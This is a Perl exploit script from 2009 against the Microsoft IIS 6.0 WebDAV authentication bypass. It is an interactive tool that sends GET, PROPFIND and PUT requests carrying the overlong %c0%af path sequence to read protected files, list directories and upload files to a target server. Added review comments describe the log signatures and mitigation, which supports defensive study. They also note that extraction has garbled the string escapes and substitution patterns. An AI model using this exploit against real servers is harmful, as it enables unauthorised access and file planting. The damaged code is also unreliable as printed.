# Title : Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl)
# Published : 2009-05-26
# Author : ka0x
#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# Advisory: http://www.milw0rm.com/exploits/8765
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!
use IO::Socket ;
# Positional arguments: the target host and the WebDAV path to request.
my ( $host, $path ) = @ARGV ;
my $port = 80 ; # webserver port
# Print the usage text and exit when the second argument is missing or false
# (a path of "0" is therefore also treated as missing).
&usage unless $ARGV[1] ;
# Intended to strip a leading "http://" scheme from the host argument.
# NOTE(review): as rendered here the pattern is not valid Perl; the listing
# appears to have lost characters during extraction -- confirm against the original.
$host =~ s/http://// if($host =~ /^http:///i) ;
# Intended to drop a leading "/" from the path; the request lines further down
# prepend their own "/". NOTE(review): same rendering problem as the line above.
$path =~ s//// if(substr($path, 0,1) eq '/');
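# Read an entire local file and return its contents as a single string.
#
# Takes the file path as its only argument. Dies with the OS error text if
# the file cannot be opened. An empty file yields the empty string.
sub _file {
    my ($file) = @_;

    # Three-argument open with a lexical handle: the path is typed in at a
    # prompt, and the two-argument form would interpret mode or pipe
    # characters inside it instead of treating it purely as a file name.
    open(my $fh, '<', $file) or die "[-] ERROR: $!\n";

    # Slurp into a lexical buffer. The earlier version appended to a package
    # global, so a second call returned the previous file's data as well.
    my $cont = do { local $/; <$fh> };
    close($fh);

    return defined $cont ? $cont : '';
}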
# Interactive command loop. Each pass opens a fresh TCP connection to
# $host:$port *before* the command is read, so 'help' and 'quit' also cause
# a connection to the server.
#
# Defender's reading of the traffic this loop generates: every request puts
# the sequence %c0%af (an overlong UTF-8 encoding of "/") into the URI of a
# GET carrying "Translate: f", a PROPFIND, or a PUT. Those combinations are
# what to look for in IIS logs or at a filtering proxy; disabling WebDAV where
# it is not needed and applying the vendor's security update remove the exposure.
#
# NOTE(review): string escapes and the substitution patterns below look
# damaged by extraction ("rn", "n", "t", and `s///%c0%af//`); as rendered the
# substitutions are not valid Perl -- confirm against the original listing.
print "write 'help' for get help listn";
while( 1 ) {
# New socket per iteration; dies with the OS error if the connect fails.
my $sock = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp') || die "n[-] ERROR: ".$!,"n" ;
print "$> ";
chomp( my $option = <STDIN> ) ;
last if $option eq 'quit' ;
# 'source': request the resource itself rather than its rendered output.
if($option eq 'source') {
# Rewrites $path in place to carry the %c0%af sequence. $path is shared by all
# branches, so the rewrite is applied again on every later command.
$path =~ s///%c0%af// ;
print $sock "GET /".$path." HTTP/1.1rn" ;
# "Translate: f" is the WebDAV header sent with the GET.
print $sock "Translate: frn" ;
print $sock "Host: ".$host."rn" ;
print $sock "Connection: closernrn" ;
# Echo the raw server response to the terminal.
while(<$sock>){
print $_ ;
}
close($sock) ;
}
# 'path': WebDAV PROPFIND against the same rewritten path.
elsif($option eq 'path') {
$path =~ s///%c0%af// ;
print $sock "PROPFIND /".$path." HTTP/1.1rn" ;
print $sock "Host: ".$host."rn" ;
print $sock "Connection:closern" ;
print $sock 'Content-Type: text/xml; charset="utf-8"'."rn" ;
# Declares a zero-length body, yet an XML propfind document is written
# straight after the headers on the next line.
print $sock "Content-Length: 0rnrn" ;
print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
# 'put': write a local file to the server under the fixed name my_file.txt.
elsif($option eq 'put') {
$path =~ s///%c0%af// ;
print "[*] Insert a local file (ex: /root/file.txt): " ;
# $local and $file_l are undeclared package globals.
chomp( $local = <STDIN> ) ;
$file_l = _file( $local ) ;
print $sock "PUT /".$path."my_file.txt HTTP/1.1rn" ;
print $sock "Host: ".$host."rn" ;
# Content-Type is always text/xml, whatever the local file contains.
print $sock 'Content-Type: text/xml; charset="utf-8"'."rn" ;
print $sock "Connection:closern" ;
print $sock "Content-Length: ".length($file_l)."rnrn" ;
# The trailing line terminator is sent in addition to the declared length.
print $sock $file_l,"rn" ;
while(<$sock>){
print $_ ;
}
close($sock) ;
}
# 'help': list the commands; the socket opened above is not used or closed here.
elsif($option eq 'help') {
print "ntt- OPTIONS -nnn" ;
print "thelpttgive this help listn" ;
print "tsourcettget file contentn" ;
print "tpathttget directory contentsn" ;
print "tputttput filen" ;
print "tquitttexit exploitnn" ;
}
# Any other input falls through and the loop reconnects and prompts again.
}
# Show the banner and command-line synopsis, then terminate the script.
# The heredoc is single-quoted, so "$0" is printed literally, not expanded.
sub usage {
my $banner = <<'EOH';
$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
$ written by ka0x <ka0x01[at]gmail.com>
$ 25/05/2009
usage:
perl $0 <host> <path>
example:
perl $0 localhost dir/
perl $0 localhost dir/file.txt
EOH
print $banner ;
exit 0 ;
}
__END__